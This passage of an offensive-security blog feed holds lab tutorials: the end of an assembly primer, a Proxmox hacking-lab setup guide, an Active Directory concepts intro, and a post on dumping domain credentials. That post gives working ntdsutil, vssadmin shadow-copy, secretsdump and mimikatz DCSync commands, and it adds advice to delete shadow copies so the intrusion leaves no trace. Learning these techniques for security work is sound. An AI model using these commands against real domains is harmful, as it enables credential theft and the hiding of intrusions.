One star among these flags is the &quot;zero flag,&quot; a prominent player in the drama of equality. When an operation results in 0—say, a subtraction in &quot;sub ebx, eax&quot;—the zero flag takes center stage, setting itself to 1. Enter the &quot;je&quot; instruction, which keenly observes this flag. If the subtraction yields equality (zero flag set to 1), &quot;je&quot; gracefully takes its cue, changing the instruction pointer to the memory address it signifies.

```nasm
sub ebx, eax
je 804833C

```
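
A tiny model of that flag logic, assuming 32-bit registers:

```python
def sub_and_flags(ebx, eax):
    # Model "sub ebx, eax": the result plus the zero flag it sets
    result = (ebx - eax) % (2 ** 32)    # registers wrap around at 32 bits
    zf = 1 if result == 0 else 0
    return result, zf

# Equal operands: ZF = 1, so a following "je" would take the jump
_, zf = sub_and_flags(0x5, 0x5)
assert zf == 1

# Unequal operands: ZF = 0, execution falls through instead
_, zf = sub_and_flags(0x7, 0x5)
assert zf == 0
```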

![](/content/images/2023/01/jump-1-.png)

# Conclusions

And with that, we draw the curtain on the inaugural chapter of our Binary Exploitation journey! 🎉 In this act, we navigated the intricate landscape of assembly code, exploring the elegant dance of instructions, registers, and the magic of memory.

But fear not, for the stage is set for the next chapter. Join me as we unravel the secrets of function conventions and tiptoe into the captivating realm of reverse engineering. It&apos;s a promise of more revelations and a deeper dive into the fascinating world of binary exploits.

I trust you enjoyed this opening act, and I eagerly await our next rendezvous. Until then, happy coding, and see you in the next installment! 😊🔍

# Resources

[Nightmare - Nightmare](https://guyinatuxedo.github.io/index.html)

[Guía de auto-estudio para la escritura de exploits · Guía de exploits](https://fundacion-sadosky.github.io/guia-escritura-exploits/)</content:encoded><author>Ruben Santos</author></item><item><title>Unveiling the Secrets of Domain Controllers: A Journey into Active Directory Security</title><link>https://www.kayssel.com/post/active-directory-2-computers</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-2-computers</guid><description>Introduction In this journey through Active Directory security, we immerse ourselves in the pivotal role of Domain Controllers (DC). Positioned as central servers housing Active Directory Domain Services (AD DS), DCs play a fundamental role in maintaining the New Technologies Directory Services (...</description><pubDate>Fri, 20 Jan 2023 10:30:54 GMT</pubDate><content:encoded># Introduction

In this journey through Active Directory security, we immerse ourselves in the pivotal role of Domain Controllers (DC). Positioned as central servers housing Active Directory Domain Services (AD DS), DCs play a fundamental role in maintaining the NT Directory Services (NTDS) database. Not only do they oversee the database, but they also orchestrate authorization, authentication, and various essential services within the domain.

# Domain Controllers

The NTDS database, located at &quot;C:\\Windows\\NTDS,&quot; contains essential domain objects. Infiltrating this fortress through access to the NTDS file presents a substantial threat to the entire domain. It is crucial to comprehend interconnected services like DNS, LDAP, and SMB, among others, to ensure secure access to NTDS data. If these terms are unfamiliar, fret not—we&apos;ll delve into them in future articles, providing a comprehensive understanding of their roles and significance.

![](/content/images/2023/01/DCActualizacion-2.png)

Diagram to show how to update the NTDS

## Discovery Domain Controllers

Locating Domain Controllers within a domain is paramount. A non-intrusive method involves a DNS query using the nslookup tool. This query seeks servers with the Lightweight Directory Access Protocol (LDAP) service open, providing vital information about Domain Controllers.

```cmd
C:\Users\Administrator&gt;nslookup -q=srv _ldap._tcp.dc._msdcs.shadow.local
Server:  UnKnown
Address:  ::1

_ldap._tcp.dc._msdcs.shadow.local	SRV service location:
	 priority       = 0
	 weight         = 100
	 port           = 389
	 svr hostname   = DC-SHADOW.SHADOW.local
DC-SHADOW.SHADOW.local	internet address = 192.168.253.130

```

An alternative, slightly more intrusive approach involves using nmap to scan for hosts with LDAP port 389 open.

```cmd
┌──(rsgbengi㉿kali)-[~]
└─$ sudo nmap -sS --open -p389 192.168.253.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 10:54 CET
Nmap scan report for 192.168.253.130
Host is up (0.00023s latency).

PORT    STATE SERVICE
389/tcp open  ldap
MAC Address: 42:5A:97:56:1E:F6 (Unknown)

Nmap done: 256 IP addresses (3 hosts up) scanned in 3.86 seconds

```

For those who have compromised a user account, the nltest tool becomes handy in listing Domain Controllers.

```cmd
C:\Users\Administrator&gt; nltest /dclist:shadow.local
Get list of DCs in domain &apos;shadow.local&apos; from &apos;\\DC-SHADOW.SHADOW.local&apos;.
    DC-SHADOW.SHADOW.local [PDC]  [DS] Site: Default-First-Site-Name
The command completed successfully

```

# **Dumping the NTDS: Unlocking the Heart of Active Directory**

At the core of Active Directory lies the NTDS. Understanding how to obtain information from it becomes crucial. To dump the domain database, we have two main methods: one from the Domain Controller itself using tools like ntdsutil.exe or vssadmin, and another performed remotely using tools like impacket&apos;s secretsdump script or mimikatz with the lsadump::dcsync command.

## **Dump from Domain Controller: Utilizing ntdsutil.exe**

Utilizing ntdsutil.exe allows us to save a snapshot of the database status, as demonstrated by the following command:

```powershell
powershell &quot;ntdsutil.exe &apos;ac i ntds&apos; &apos;ifm&apos; &apos;create full c:\temp&apos; q q&quot;
```

The command above performs a pivotal task: creating a copy of the NTDS and subsequent copies of the SYSTEM and SECURITY registry hives. While I&apos;ll delve into the intricacies of the SECURITY hive in forthcoming articles, the focus here is on the SYSTEM hive, housing the indispensable Syskey/BootKey. This key plays a paramount role in the decryption process, which unfolds across three levels:

1.  **First Level:** Decrypt the Password Encryption Key (PEK). The PEK is initially encrypted with the BootKey using RC4.
2.  **Second Level:** Initiate the first phase of decrypting hashes with the PEK using RC4.
3.  **Third Level:** Progress to the second phase of decrypting hashes using DES.

Acquiring the BootKey becomes the linchpin in this process. Once obtained, we gain the ability to decrypt the NTDS content, courtesy of accessing the PEK value. Remarkably, the PEK maintains a uniform value across all Domain Controllers. In contrast, the BootKey varies for each computer, underscoring its unique significance in this intricate decryption dance.
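The three levels above can be illustrated with a toy round-trip in Python. This is only a sketch: it uses invented key values, a minimal pure-Python RC4, and omits both the final DES layer and the real key-derivation steps (the actual scheme derives its RC4 keys from the BootKey and PEK with salts and hashing rather than using them directly).

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Minimal RC4 (KSA + PRGA). Encrypting and decrypting are the same op."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# Toy values -- NOT the real key-derivation or on-disk layout.
bootkey = b"per-DC-bootkey!!"   # unique per machine, from the SYSTEM hive
pek = b"domain-wide-PEK!"       # identical on every Domain Controller
nt_hash = b"16-byte-NT-hash!"

sealed_pek = rc4(bootkey, pek)    # level 1: PEK sealed with the BootKey
sealed_hash = rc4(pek, nt_hash)   # level 2: hash sealed with the PEK
# level 3 (a final DES pass keyed from the account RID) is omitted here

recovered_pek = rc4(bootkey, sealed_pek)
recovered_hash = rc4(recovered_pek, sealed_hash)
assert recovered_pek == pek and recovered_hash == nt_hash
```

The takeaway is the layering: without the per-DC BootKey you cannot recover the PEK, and without the PEK the stored hashes stay sealed.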

![](/content/images/2023/01/image-44.png)

Sample execution of ntdsutil.exe

To access the Domain Controller, we leverage the smbclient tool from Impacket on our Kali Linux machine within the lab. This tool facilitates seamless file downloads from the remote machine, enhancing our control and maneuverability in the process.

![](/content/images/2023/01/image-46.png)

Smbclient sample

By employing the secretsdump script, we execute an NTDS dump with a focus on the SYSTEM hive. This strategic dump empowers us to harvest valuable information, including domain users, alongside their corresponding NTLM hashes and Kerberos keys.

![](/content/images/2023/01/image-45.png)

Secretsdump sample

## **Copy NTDS using Volume Shadow Copy service: A Stealthy Approach**

To duplicate the NTDS database through the Volume Shadow Copy service, we harness the functionalities of VSS—an ingenious service enabling the creation of backup copies of volumes even as applications actively engage with and write to them. For this task, Windows offers the vssadmin tool, a reliable ally in our data replication endeavors. Before embarking on the volume copy operation, it&apos;s imperative to ensure the presence of the desired files. Typically, NTDS takes residence in &quot;C:\\Windows\\NTDS\\ntds.dit,&quot; while the SYSTEM file finds its abode in &quot;C:\\Windows\\System32\\config\\SYSTEM.&quot;

```cmd
vssadmin create shadow /for=C:

```

This will give us the result shown in the following capture:

![](/content/images/2023/01/image-47.png)

Shadow copy creation

Upon the completion of the copy process, we proceed to duplicate the specific files of interest—namely, NTDS.dit and SYSTEM.

```cmd
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\system C:\system

```

![](/content/images/2023/01/image-48.png)

Copy the files we are interested in from shadow copy

![](/content/images/2023/01/image-49.png)

Sample of the technique&apos;s effectiveness

To transfer the desired files to our Kali Linux machine, we can utilize smbclient once again. Following the file transfer, it is imperative to erase any traces of the intrusion by removing the shadow copy.

```cmd
vssadmin list shadows
vssadmin delete shadows /Shadow={id}

```

![](/content/images/2023/01/image-50.png)

Removal of shadow copy to erase evidence of the intrusion

## **Remote Credential Dump: The Dcsync Technique**

In the realm of cybersecurity, the technique known as &quot;Dcsync&quot; emerges as a potent method for acquiring NTDS credentials, allowing access to hashes for domain accounts without the need for direct interaction with a domain controller or the extraction of the NTDS database.

As we explored in the &quot;Domain Controllers&quot; section, each DC houses a synchronized copy of the NTDS, perpetually updated across all DCs to reflect changes. Leveraging this synchronization capability, the Dcsync technique empowers an attacker to pose as a DC, initiating requests to the Windows API for Active Directory synchronization and replication. Specifically, the DRSGetNCChanges call of the drsuapi interface plays a pivotal role in this Directory Replication Service (DRS) protocol.

What adds to the intrigue is the fact that it can be executed from virtually any machine, granted the user possesses the requisite permissions: &quot;Replicating Directory Changes All&quot; and &quot;Replicating Directory Changes.&quot; Typically, this technique finds its prime application in scenarios involving a domain administrator, naturally endowed with these privileges.

**However, a note of caution is warranted. Deploying this technique recklessly, especially in expansive domains, may trigger memory overload on the responding DC, potentially resulting in a crash. Prudent execution is key to navigating the power of Dcsync effectively.**

![](/content/images/2023/01/dcsync.png)

Dcsync Technique

### Using secretsdump

To employ this technique, impacket&apos;s secretsdump script becomes a valuable ally once again. What sets this script apart is its versatility: you don&apos;t necessarily need a compromised Windows machine to execute it. Operating seamlessly from your Kali Linux machine, the secretsdump script unfolds a treasure trove of critical information. Fear not if the intricacies seem daunting at first; we&apos;ll delve into each facet in due course:

-   LM and NT password hashes
-   Passwords stored with reversible encryption
-   Kerberos keys (DES, AES128, and AES256)
-   Secrets of the Domain Controller&apos;s SAM
-   Insights into the Domain Controller&apos;s LSA

This arsenal of data, extracted through the secretsdump script, unveils the intricate layers of security measures employed within the Active Directory environment. Stay with me, and we&apos;ll demystify each element as we progress.

![](/content/images/2023/01/image-57.png)

NTDS dump via secretsdump remotely
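The NTDS hash lines in secretsdump&apos;s output follow the pwdump-style `user:rid:lmhash:nthash:::` layout. A small Python parser can turn those lines into structured records; the sample line below is fabricated (and deliberately uses the well-known empty-password LM/NT hashes), not output from the lab.

```python
def parse_secretsdump_line(line: str):
    """Parse one 'user:rid:LM:NT:::' line into a dict, or None if malformed."""
    parts = line.strip().split(":")
    if len(parts) >= 4 and parts[1].isdigit():
        return {
            "user": parts[0],
            "rid": int(parts[1]),
            "lm_hash": parts[2],
            "nt_hash": parts[3],
        }
    return None

# Fabricated sample line with the well-known empty-password LM/NT hashes
sample = "shadow.local\\vaan:1104:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"
record = parse_secretsdump_line(sample)
```

From here the NT hashes can be fed straight into cracking or pass-the-hash tooling.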

### Mimikatz

Initiating this journey involves logging in with a user endowed with domain administrator privileges. Navigate to the core of your domain control: Tools &gt; Active Directory Users and Computers &gt; Users. Select your chosen user, right-click, and delve into the &quot;Add to a group...&quot; option. At this pivotal juncture, explicitly enroll the user into the esteemed Domain Admins group. This strategic move empowers your user with the essential authority for the upcoming tasks.

![](/content/images/2023/01/image-63.png)

Add a user to the Domain Admins group

After adding the user to this group, validate the modified privileges with a command that speaks volumes:

```cmd
whoami /groups

```

![](/content/images/2023/01/image-65.png)

Verification that the user is Domain Admin

This insightful command unveils the transformed landscape of privileges, affirming the ascendancy and confirming the strategic enhancements made to bolster your group&apos;s authority. Dive into the realm of elevated privileges with confidence, as you navigate the path of administrative empowerment.

Embarking on the journey with Mimikatz requires a crucial step – the upload of this potent tool onto the target machine. In this tactical maneuver, the smbclient script emerges as your ally, wielding the &apos;put&apos; function to seamlessly transport Mimikatz to its designated destination.

```cmd
┌──(rsgbengi㉿kali)-[~/Downloads/x64]
└─$ impacket-smbclient Administrator@192.168.253.131
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
Type help for list of commands
# use C$
# cd Users
# cd vaan
# cd Desktop
# put mimikatz.exe

```

Now that the pieces are in place, the stage is set for the grand unveiling. Execute Mimikatz with the following command:

```cmd
lsadump::DCSync /domain:shadow.local /user:vaan

```

With this command, the curtains rise on a spectacle of information, revealing a treasure trove of insights:

-   User account information (SAM username, account type, account options...)
-   Security ID (SID) and Relative ID (RID)
-   Kerberos Keys
-   Plaintext password if the account has reversible encryption enabled.

Mimikatz, now in the spotlight, orchestrates this revelation with finesse, extracting critical details that cast a spotlight on the security landscape. The command becomes the key to unlocking a realm of knowledge, offering a panoramic view of the domain&apos;s inner workings.

![](/content/images/2023/01/image-64.png)

Using mimikatz to obtain data from the NTDS

# Conclusion

In conclusion, understanding the intricacies of Domain Controllers and the methods employed to extract information from the NTDS database is vital in fortifying Active Directory security. As we navigate through tools and techniques, always remember the ethical implications of these actions and execute them within legal boundaries.

# References

[Dumping Domain Controller Hashes Locally and Remotely - Red Team Notes](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration)

[Credential Dumping: NTDS.dit - Hacking Articles](https://www.hackingarticles.in/credential-dumping-ntds-dit/)

[NTDS.DIT – Penetration Testing Lab](https://pentestlab.blog/tag/ntds-dit/)

[Mimikatz DCSync Usage, Exploitation, and Detection](https://adsecurity.org/?p=1729)



[Hacking Windows: Ataques a sistemas y redes Microsoft](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)</content:encoded><author>Ruben Santos</author></item><item><title>Building Your Hacking Playground: Proxmox Unveiled and Windows Symphony</title><link>https://www.kayssel.com/post/offensive-security-lab-1</link><guid isPermaLink="true">https://www.kayssel.com/post/offensive-security-lab-1</guid><description>Introduction Welcome to the kickoff of our series, where I&apos;ll guide you through the art of setting up a dynamic hacking practice environment. This first post is all about laying the groundwork for a potent Windows hacking practice arena using Proxmox. Excitingly, in the chapters to come, we&apos;ll un...</description><pubDate>Fri, 13 Jan 2023 11:00:39 GMT</pubDate><content:encoded># Introduction

Welcome to the kickoff of our series, where I&apos;ll guide you through the art of setting up a dynamic hacking practice environment. This first post is all about laying the groundwork for a potent Windows hacking practice arena using Proxmox. Excitingly, in the chapters to come, we&apos;ll unravel advanced configurations, network optimizations, and ventures into realms like pivoting and web hacking.

# **Unveiling Proxmox**

Proxmox, our secret weapon, is a type-1 hypervisor: sophisticated software allowing multiple Virtual Machines (VMs) to gracefully share the stage on a single computer, utilizing its resources with finesse. Think of it as a maestro orchestrating a symphony of VMs. Unlike type-2 counterparts such as VirtualBox or VMware Workstation, which run on top of a desktop operating system, Proxmox runs directly on the hardware, making it the virtuoso of hypervisors.

![](/content/images/2023/01/hypervisor.png)

Difference between hypervisor type 1 and type 2

# Embarking on level 1 lab setup

For our maiden voyage into the hacking cosmos, I&apos;ve chosen my humble home network. Through the magic of Dynamic Host Configuration Protocol (DHCP), our router will bestow IPs upon the virtual machines residing on the Proxmox stage—an old yet robust laptop boasting 16 GB of RAM and a 1-terabyte SSD. The more brawn your device flexes, the grander the virtual ensemble you can orchestrate. For our inaugural symphony of hacking techniques, you&apos;ll need a machine capable of harmonizing two Windows virtuosos, one Domain Controller maestro, and a Linux soloist—the attacker.

![](/content/images/2023/01/homeLab.png)

Lab that I am going to set up
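Before creating the VMs, a quick back-of-the-envelope check confirms the 16 GB of RAM can cover the planned guests. The per-VM figures below are my own illustrative split, not prescribed values:

```python
# Illustrative RAM budget for the level-1 lab (all GB values are assumptions)
HOST_RAM_GB = 16
RESERVED_FOR_PROXMOX_GB = 2   # keep headroom for the hypervisor itself

vms = {
    "DC-SHADOW (Windows Server 2019)": 4,
    "Workstation 1 (Windows 10)": 4,
    "Workstation 2 (Windows 10)": 4,
    "Attacker (Kali Linux)": 2,
}

allocated = sum(vms.values())
headroom = HOST_RAM_GB - RESERVED_FOR_PROXMOX_GB - allocated
print(f"Allocated {allocated} GB, headroom {headroom} GB")
assert headroom >= 0, "Over-committed: shrink a VM or add RAM"
```

If your hardware is tighter, trim the Windows 10 guests first; the Domain Controller is the one machine that resents starvation.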

# Setting the Proxmox Stage

To achieve this symphonic feat, follow the steps in NetworkChuck&apos;s video for a graceful Proxmox installation and setup. Once the curtains rise, access the Proxmox control panel via the web.

![](/content/images/2023/01/image.png)

Proxmox control panel

With our groundwork complete, the next act involves uploading the essential ISOs for our virtual machines. Navigate to pve &gt; local (pve) &gt; Upload to initiate this crucial step. Ensure you upload the respective ISOs for both the Windows 10 and Windows Server 2019 machines, setting the stage for a seamless performance.

For the orchestration of Windows machines, installing VirtIO drivers is paramount. To achieve this, we&apos;ll utilize the VirtIO ISO. Find the download link in the dedicated links section. When accessing the GitHub webpage, opt for the latest version, as illustrated in the accompanying image. This strategic choice ensures we harness the most refined tools for our virtual symphony.

![](/content/images/2023/01/image-2.png)

VirtIO ISO download sample

# **Crafting the Windows Server 2019 Symphony**

Compose the virtual machine with a name that resonates with you, harmonizing CPU and memory with your machine&apos;s capabilities. Meticulously configure each tab, ensuring a seamless performance.

![](/content/images/2023/11/image-63.png)

General tab

![](/content/images/2023/11/image-64.png)

OS tab

![](/content/images/2023/11/image-65.png)

System tab

![](/content/images/2023/11/image-66.png)

Disks tab

![](/content/images/2023/11/image-67.png)

CPU tab

![](/content/images/2023/11/image-68.png)

Memory tab

![](/content/images/2023/11/image-69.png)

Network tab

![](/content/images/2023/11/image-70.png)

All the configuration

In the hardware tab, add the VirtIO ISO to infuse the magic of Windows drivers. After this configuration, your machine should run smoothly without a hitch.

![](/content/images/2023/01/image-10.png)

Add VirtIO ISO

Once in the domain controller configuration, select your preferred language and specify that you want to utilize &quot;Windows Server 2019 Standard Evaluation (Desktop Experience).&quot; This sets the stage for a robust and user-friendly server environment.

![](/content/images/2023/01/image-11.png)

Selection of the Windows Server version to be installed

Next, opt to configure the operating system installation by selecting &quot;Custom: Install Windows only (advanced).&quot; A menu will appear, prompting you to click on &quot;browse&quot; for driver selection. Choose disk D, which houses the driver image, and then select the 2019 drivers from the &quot;virtio&quot; folder. This careful driver orchestration ensures a flawless installation process.

![](/content/images/2023/11/image-71.png)

Driver search

![](/content/images/2023/11/image-72.png)

Disk D

![](/content/images/2023/11/image-73.png)

Drivers selection

Click &apos;Next&apos; to initiate the installation, and you should be presented with the space allocation for your machine (Drive 0). After completing the installation, proceed to create an administrator user. While security is paramount, for the purposes of our test lab, set a straightforward password, such as &quot;P@$$w0rd.&quot;

![](/content/images/2023/11/image-75.png)

Installation

![](/content/images/2023/11/image-76.png)

Drive 0

![](/content/images/2023/01/image-14.png)

Sample administrator user configuration

With these configurations in place, the next destination is the Domain Controller. Accessing the user login interface is a breeze – simply click on the button depicted in the image below, mirroring the familiar &quot;Ctrl+Alt+Delete&quot; sequence. This action seamlessly opens the gateway to the Domain Controller, paving the way for further exploration within our orchestrated environment.

![](/content/images/2023/01/image-15.png)

Access to the log in

Now, you&apos;ve successfully tuned the Windows Server 2019 machine to play its part in our hacking symphony.

# Windows 10: The crescendo

The Windows 10 symphony echoes similar notes of configuration. Compose the settings across General, OS, System, Disk, CPU, Memory, and Network tabs. Run the machine, initiating the configuration for language and keyboard preferences during the installation process.

![](/content/images/2023/11/image-77.png)

General tab

![](/content/images/2023/11/image-78.png)

OS tab

![](/content/images/2023/11/image-79.png)

System tab

![](/content/images/2023/11/image-80.png)

Disk tab

![](/content/images/2023/11/image-81.png)

CPU tab

![](/content/images/2023/11/image-82.png)

Memory tab

![](/content/images/2023/11/image-83.png)

Network tab

![](/content/images/2023/11/image-84.png)

Click again on &quot;Custom Installation,&quot; and this time, ensure that the disk where you want to install Windows is visible. If it doesn&apos;t appear, repeat the virtuoso act of loading the drivers, akin to our earlier steps with Windows Server 2019. This ensures a flawless installation process that resonates with perfection.

![](/content/images/2023/01/image-17.png)

Disk selection sample

Upon entering the system, revisit language and keyboard configuration. A dialog may appear, indicating a failure to connect to the internet. Fear not, and click on the option at the bottom left, stating &quot;I don&apos;t have Internet.&quot; In the subsequent dialog, choose &quot;Continue with limited setup.&quot; The virtual machine will restart, and you&apos;ll need to repeat this process to continue without internet. Select the option &quot;I don&apos;t have internet&quot; once again.

![](/content/images/2023/01/image-18.png)

Select the option &quot;I don&apos;t have internet&quot;

![](/content/images/2023/01/image-19.png)

Select the option &quot;Continue with limited setup&quot;

Finally, establish credentials for the user that will access the machine. The subsequent privacy and security prompts can safely be left at their defaults for a test lab. After completing these steps, revel in the crescendo as you gain access to your Windows 10 machine.

![](/content/images/2023/01/image-20.png)

Access to Windows 10 machine

To conclude this part of the lab, repeat this same process to create a second Windows 10 machine, adding another layer of harmony to our hacking symphony.

# Conclusions

This concludes the first part of our series! 🥳 In the next installment, we&apos;ll dive into setting up drivers for virtual machines to ensure network access. Additionally, we&apos;ll explore how to configure both the Domain Controller and Windows 10 machines to create a fully functional Windows hacking lab.

# Links

[virtio-win-pkg-scripts/README.md at master · virtio-win/virtio-win-pkg-scripts](https://github.com/virtio-win/virtio-win-pkg-scripts/blob/master/README.md)</content:encoded><author>Ruben Santos</author></item><item><title>Initiating the Active Directory Odyssey: Unveiling Key Concepts and Building the Foundations</title><link>https://www.kayssel.com/post/active-directory-1</link><guid isPermaLink="true">https://www.kayssel.com/post/active-directory-1</guid><description>Introduction to the series Embark on a journey through the first post of this blog, where we unravel the intricacies of Active Directory. This topic, a personal favorite and a recurrent element in offensive security projects, takes center stage in our exploration. A year ago, I initiated the Igri...</description><pubDate>Fri, 06 Jan 2023 21:46:13 GMT</pubDate><content:encoded># Introduction to the series

Embark on a journey through the first post of this blog, where we unravel the intricacies of Active Directory. This topic, a personal favorite and a recurrent element in offensive security projects, takes center stage in our exploration. A year ago, I initiated the Igris project—a Python tool crafted to test Active Directory security. Currently paused for re-engineering in the Nim programming language, it serves as a potential foundation for those keen on creating offensive security tools. The development of Igris not only provided valuable insights into these environments but also fueled my desire to fortify and expand my knowledge.

In this series, I will share a collection of articles covering various Active Directory topics as I encounter and learn them. For programming enthusiasts, I&apos;ll delve into the application of key Python libraries, demonstrating their utility in crafting practical tools for diverse scenarios. The exploration extends to both the Cmd console and the PowerShell console, showcasing methods to collect information on the discussed concepts.

I trust you will find this series both informative and enjoyable. Thanks for embarking on this learning journey with me! 😊

# **Things to Keep in Mind: Guiding Your Learning Path**

This series caters to individuals venturing into offensive security, with a specific focus on Active Directory. Our expedition will gradually venture into more technical terrain, starting with the fundamentals. Acknowledging my non-expert status, I believe this series can be particularly beneficial for those new to Active Directory, as the mistakes I encounter may resonate with others in the future.

For effective practice, consider setting up an Active Directory lab. I recommend The Cyber Mentor&apos;s video for lab creation. If you opt for a Proxmox server setup, refer to my blogs on this topic:

[Offensive Lab](https://www.kayssel.com/series/offensive-lab/)

How to set up an Active Directory environment to practice in VMware

Regarding Python, we won&apos;t cover basic language concepts. Instead, the focus will be on aspects of key libraries used. If you lack basic Python knowledge, numerous online tutorials are available. With these considerations in mind, let&apos;s dive into the series!

# **What is Active Directory?: Simplifying Centralized Management**

In essence, Active Directory is a system designed to centrally manage an organization&apos;s computers and users. To illustrate its advantages, consider the scenario of a new employee joining an organization and needing access to various computers. Without Active Directory, creating a user account on each computer becomes a laborious task. However, by connecting these computers to an Active Directory network, only one user account for the new employee needs creation in the centralized database. This streamlined process ensures access to all network-connected computers without individual account creation on each.

After this succinct overview, let&apos;s introduce key concepts essential for understanding Active Directory environments.

## **Key Concepts in Active Directory**

### **Domains**

In the realm of Active Directory, a domain is akin to the previously mentioned &quot;Active Directory network.&quot; It constitutes a collection of computers sharing the same centralized database, housed in a &quot;Domain Controller.&quot; Future posts will delve deeper into the intricacies of Domain Controllers. An essential concept is the domain name or DNS name, often identical to the organization&apos;s website. For example, a domain name might be kayssel.com, while an internal network domain could be shadow.local.

To determine the domain name to which a computer belongs, execute the following commands in the PowerShell console:

```powershell
PS C:\Users\beruinsect&gt; $env:USERDNSDOMAIN
SHADOW.LOCAL
PS C:\Users\beruinsect&gt; (Get-ADDomain).DNSRoot
shadow.local

```

### **Computers**

In Active Directory environments, a computer has an account of its own, much like a user, and must be connected to a Domain Controller to belong to the domain. Three types of computers exist:

1.  **Domain Controllers (DCs):** Central servers managing the domain, housing the centralized database. These servers run on Windows Server Machines.
2.  **Workstations:** Personal computers used daily, typically running on Windows 10 or Windows 11.
3.  **Servers:** Computers offering web, file, or database services, usually running on Linux or Windows Server machines.

### Users

One of the main advantages of Active Directory is user management. As explained earlier, creating and configuring a user in the centralized database ensures changes affect all domain computers. All user data, residing in the centralized database, can be accessed from any domain point with the necessary permissions. Active Directory hosts two main user types: local users, with access limited to the machines on which they are created, and domain users, by default having access to all domain computers.

```bash
WORKGROUP/iron    #Local User
shadow.local/iron #Domain User

```
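The naming convention above can be captured in a couple of lines of Python. The `WORKGROUP` marker and the `/` separator follow the sample notation shown here, not a formal Windows API:

```python
def classify_account(qualified_name: str) -> dict:
    """Split 'scope/user' and label it local or domain, per the notation above."""
    scope, _, user = qualified_name.partition("/")
    kind = "local" if scope.upper() == "WORKGROUP" else "domain"
    return {"scope": scope, "user": user, "kind": kind}

print(classify_account("WORKGROUP/iron"))     # a local user
print(classify_account("shadow.local/iron"))  # a domain user
```

The same account name (`iron`) can exist in both scopes; only the qualifier tells you which database authenticates it.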

# **Lab Scheme: Navigating the Active Directory Learning Landscape**

Concluding this inaugural chapter, let&apos;s introduce the main components of the lab instrumental in learning about Active Directory. The lab domain, named shadow.local, utilizes the IP range 192.168.253.0/24. Within the domain are two workstations, one for user Beru and one for user Iron—both operating on Windows 10 and connected to the Dc-Shadow Domain Controller, which runs Windows Server 2019. These components set the stage for further exploration in upcoming posts.

![](/content/images/2023/01/componets.png)

Main laboratory components to be used in the following posts.

# References

The main references that I have found to learn how to attack Active Directory environments are the following and will be the ones I will use as a guide to learn more about these environments :)

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)

[Hacking Windows: Ataques a sistemas y redes Microsoft](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)

[Active Directory Security – Active Directory &amp; Enterprise Security, Methods to Secure Active Directory, Attack Methods &amp; Effective Defenses, PowerShell, Tech Notes, &amp; Geek Trivia…](https://adsecurity.org/)

[Blog](https://blog.harmj0y.net/blog/)

Feel free to explore and share your thoughts on specific sections you&apos;d like to delve into further!</content:encoded><author>Ruben Santos</author></item></channel></rss>